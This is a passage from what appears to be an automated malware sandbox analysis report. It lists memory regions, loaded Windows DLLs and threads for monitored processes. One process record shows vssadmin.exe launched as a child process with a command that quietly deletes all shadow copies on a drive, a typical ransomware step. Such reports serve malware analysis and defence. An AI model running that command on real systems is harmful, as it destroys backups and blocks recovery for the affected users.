	              id = 2242
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 2243
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 2244
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 2245
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 2248
	        start_va = 0x19e540e0000
	          end_va = 0x19e540e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e540e0000"
	        filename = ""

Region:
	              id = 2249
	        start_va = 0x19e540f0000
	          end_va = 0x19e540f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e540f0000"
	        filename = ""

Region:
	              id = 2250
	        start_va = 0x19e54270000
	          end_va = 0x19e543f7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e54270000"
	        filename = ""

Region:
	              id = 2251
	        start_va = 0x19e54400000
	          end_va = 0x19e54580fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e54400000"
	        filename = ""

Region:
	              id = 2252
	        start_va = 0x19e54590000
	          end_va = 0x19e5598ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e54590000"
	        filename = ""

Region:
	              id = 2253
	        start_va = 0x19e55990000
	          end_va = 0x19e55b4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e55990000"
	        filename = ""

Region:
	              id = 2258
	        start_va = 0x9a3eb80000
	          end_va = 0x9a3ebbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000009a3eb80000"
	        filename = ""

Region:
	              id = 2268
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 2269
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 2270
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 2271
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 2272
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 2279
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 2280
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 2281
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 2282
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 2289
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 2290
	        start_va = 0x19e55990000
	          end_va = 0x19e559fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e55990000"
	        filename = ""

Region:
	              id = 2291
	        start_va = 0x19e55b40000
	          end_va = 0x19e55b4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e55b40000"
	        filename = ""

Region:
	              id = 2314
	        start_va = 0x19e55b50000
	          end_va = 0x19e55e86fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2315
	        start_va = 0x19e54130000
	          end_va = 0x19e54150fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 2316
	        start_va = 0x19e55990000
	          end_va = 0x19e559e9fff
	       monitored = 1
	     entry_point = 0x19e559a53f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 2317
	        start_va = 0x19e559f0000
	          end_va = 0x19e559fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e559f0000"
	        filename = ""

Region:
	              id = 2318
	        start_va = 0x19e55e90000
	          end_va = 0x19e560a8fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e55e90000"
	        filename = ""

Region:
	              id = 2320
	        start_va = 0x19e560b0000
	          end_va = 0x19e562cafff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e560b0000"
	        filename = ""

Region:
	              id = 2321
	        start_va = 0x19e55a00000
	          end_va = 0x19e55b0cfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e55a00000"
	        filename = ""

Region:
	              id = 2322
	        start_va = 0x19e562d0000
	          end_va = 0x19e564e9fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e562d0000"
	        filename = ""

Region:
	              id = 2324
	        start_va = 0x19e564f0000
	          end_va = 0x19e565fefff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e564f0000"
	        filename = ""

Region:
	              id = 2361
	        start_va = 0x9a3ebc0000
	          end_va = 0x9a3ebfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000009a3ebc0000"
	        filename = ""

Region:
	              id = 2362
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 2363
	        start_va = 0x19e54100000
	          end_va = 0x19e54100fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e54100000"
	        filename = ""

Region:
	              id = 2364
	        start_va = 0x19e56600000
	          end_va = 0x19e566bbfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e56600000"
	        filename = ""

Region:
	              id = 2365
	        start_va = 0x19e54100000
	          end_va = 0x19e54103fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e54100000"
	        filename = ""

Region:
	              id = 2368
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 2369
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 2370
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 2371
	        start_va = 0x19e54110000
	          end_va = 0x19e54116fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e54110000"
	        filename = ""

Region:
	              id = 2372
	        start_va = 0x19e54130000
	          end_va = 0x19e54130fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e54130000"
	        filename = ""

Region:
	              id = 2373
	        start_va = 0x19e54140000
	          end_va = 0x19e54140fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e54140000"
	        filename = ""

Region:
	              id = 2378
	        start_va = 0x19e54150000
	          end_va = 0x19e54154fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 2379
	        start_va = 0x19e54160000
	          end_va = 0x19e54160fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 2380
	        start_va = 0x19e55990000
	          end_va = 0x19e55991fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e55990000"
	        filename = ""

Region:
	              id = 2381
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 2382
	        start_va = 0x19e559a0000
	          end_va = 0x19e559a0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 2383
	        start_va = 0x19e559b0000
	          end_va = 0x19e559b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e559b0000"
	        filename = ""


Thread:
	id = 101
	os_tid = 0x10a8


Thread:
	id = 103
	os_tid = 0xb54


Thread:
	id = 104
	os_tid = 0x4dc


Thread:
	id = 106
	os_tid = 0x1244


Process:
	id = "33"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2fa06000"
	os_pid = "0x8c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "25"
	os_parent_pid = "0x1104"
	cmd_line = "vssadmin  Delete Shadows /For=S: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 2183
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 2184
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 2185
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 2186
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 2187
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 2188
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 2189
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 2190
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 2191
	        start_va = 0x400000
	          end_va = 0x401fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 2192
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 2193
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 2194
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 2195
	        start_va = 0x7ed60000
	          end_va = 0x7ed82fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ed60000"
	        filename = ""

Region:
	              id = 2196
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2197
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 2198
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 2199
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2200
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 2213
	        start_va = 0x410000
	          end_va = 0x53ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000410000"
	        filename = ""

Region:
	              id = 2214
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 2220
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 2221
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2222
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 2231
	        start_va = 0x540000
	          end_va = 0x76ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000540000"
	        filename = ""

Region:
	              id = 2232
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2239
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 2240
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 2241
	        start_va = 0x7ec60000
	          end_va = 0x7ed5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ec60000"
	        filename = ""

Region:
	              id = 2259
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2260
	        start_va = 0x400000
	          end_va = 0x403fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 2261
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 2262
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 2263
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 2264
	        start_va = 0x410000
	          end_va = 0x44ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000410000"
	        filename = ""

Region:
	              id = 2265
	        start_va = 0x530000
	          end_va = 0x53ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000530000"
	        filename = ""

Region:
	              id = 2266
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 2273
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 2274
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 2275
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 2276
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 2277
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 2278
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 2283
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 2284
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 2285
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 2286
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 2287
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 2288
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 2292
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 2293
	        start_va = 0x4880000
	          end_va = 0x4a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 2294
	        start_va = 0x450000
	          end_va = 0x479fff
	       monitored = 0
	     entry_point = 0x455680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2295
	        start_va = 0x4880000
	          end_va = 0x4a07fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004880000"
	        filename = ""

Region:
	              id = 2296
	        start_va = 0x4a70000
	          end_va = 0x4a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a70000"
	        filename = ""

Region:
	              id = 2297
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2298
	        start_va = 0x450000
	          end_va = 0x45cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 2299
	        start_va = 0x4a80000
	          end_va = 0x4c00fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a80000"
	        filename = ""

Region:
	              id = 2300
	        start_va = 0x4c10000
	          end_va = 0x600ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004c10000"
	        filename = ""

Region:
	              id = 2301
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 2302
	        start_va = 0x460000
	          end_va = 0x460fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000460000"
	        filename = ""

Region:
	              id = 2303
	        start_va = 0x470000
	          end_va = 0x473fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000470000"
	        filename = ""

Region:
	              id = 2305
	        start_va = 0x540000
	          end_va = 0x629fff
	       monitored = 0
	     entry_point = 0x57d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 2306
	        start_va = 0x670000
	          end_va = 0x76ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000670000"
	        filename = ""

Region:
	              id = 2319
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 3055
	        start_va = 0x480000
	          end_va = 0x480fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000480000"
	        filename = ""

Region:
	              id = 3056
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
